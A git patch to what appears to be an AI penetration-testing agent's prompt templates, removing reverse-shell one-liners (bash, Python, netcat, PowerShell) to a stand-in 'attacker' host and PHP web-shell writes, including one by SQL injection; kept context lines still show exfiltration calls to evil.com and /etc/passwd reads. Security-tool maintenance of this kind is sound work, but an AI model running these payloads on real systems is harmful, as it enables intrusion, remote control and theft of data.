From 5294d613d0cf6040fffb4eab9ed1e5be50aff08d Mon Sep 17 00:00:00 2001
From: Ahmed Allam <ahmed39652003@gmail.com>
Date: Fri, 12 Sep 2025 11:52:35 -0700
Subject: [PATCH] Remove rce prompt examples

---
 pyproject.toml                                |  2 +-
 strix/prompts/vulnerabilities/rce.jinja       | 20 ++-----------------
 .../vulnerabilities/sql_injection.jinja       |  1 -
 3 files changed, 3 insertions(+), 20 deletions(-)

diff --git a/pyproject.toml b/pyproject.toml
index 55b1ff0..30f919d 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,6 +1,6 @@
 [tool.poetry]
 name = "strix-agent"
-version = "0.1.14"
+version = "0.1.15"
 description = "Open-source AI Hackers for your apps"
 authors = ["Strix <hi@usestrix.com>"]
 readme = "README.md"
diff --git a/strix/prompts/vulnerabilities/rce.jinja b/strix/prompts/vulnerabilities/rce.jinja
index 5be6df8..c3023a5 100644
--- a/strix/prompts/vulnerabilities/rce.jinja
+++ b/strix/prompts/vulnerabilities/rce.jinja
@@ -59,7 +59,7 @@ ${IFS}id
 
 <language_specific_rce>
 <php>
-- eval($_GET['cmd'])
+- eval() with user input
 - system(), exec(), shell_exec(), passthru()
 - preg_replace with /e modifier
 - assert() with string input
@@ -101,7 +101,7 @@ Works in multiple contexts:
 - DNS exfiltration: $(whoami).evil.com
 - HTTP callbacks: curl evil.com/$(id)
 - Time delays for boolean extraction
-- Write to web root: echo '<?php system($_GET["cmd"]); ?>' > /var/www/shell.php
+- Write to web root
 </blind_rce>
 
 <chained_exploitation>
@@ -163,22 +163,6 @@ concat:|file:///etc/passwd
 - Path traversal: /usr/bin/id vs id
 </waf_bypasses>
 
-<post_exploitation>
-<reverse_shells>
-Bash: bash -i >& /dev/tcp/attacker/4444 0>&1
-Python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
-Netcat: nc -e /bin/sh attacker 4444
-PowerShell: $client = New-Object System.Net.Sockets.TCPClient("attacker",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
-</reverse_shells>
-
-<persistence>
-- Cron jobs
-- SSH keys
-- Web shells
-- Systemd services
-</persistence>
-</post_exploitation>
-
 <validation>
 To confirm RCE:
 1. Execute unique command (id, hostname)
diff --git a/strix/prompts/vulnerabilities/sql_injection.jinja b/strix/prompts/vulnerabilities/sql_injection.jinja
index f3917b1..b354073 100644
--- a/strix/prompts/vulnerabilities/sql_injection.jinja
+++ b/strix/prompts/vulnerabilities/sql_injection.jinja
@@ -82,7 +82,6 @@ PostgreSQL:
 <file_operations>
 MySQL:
 ' UNION SELECT 1,2,LOAD_FILE('/etc/passwd')--
-' UNION SELECT 1,2,'<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'--
 
 MSSQL:
 '; EXEC xp_cmdshell 'type C:\Windows\win.ini'--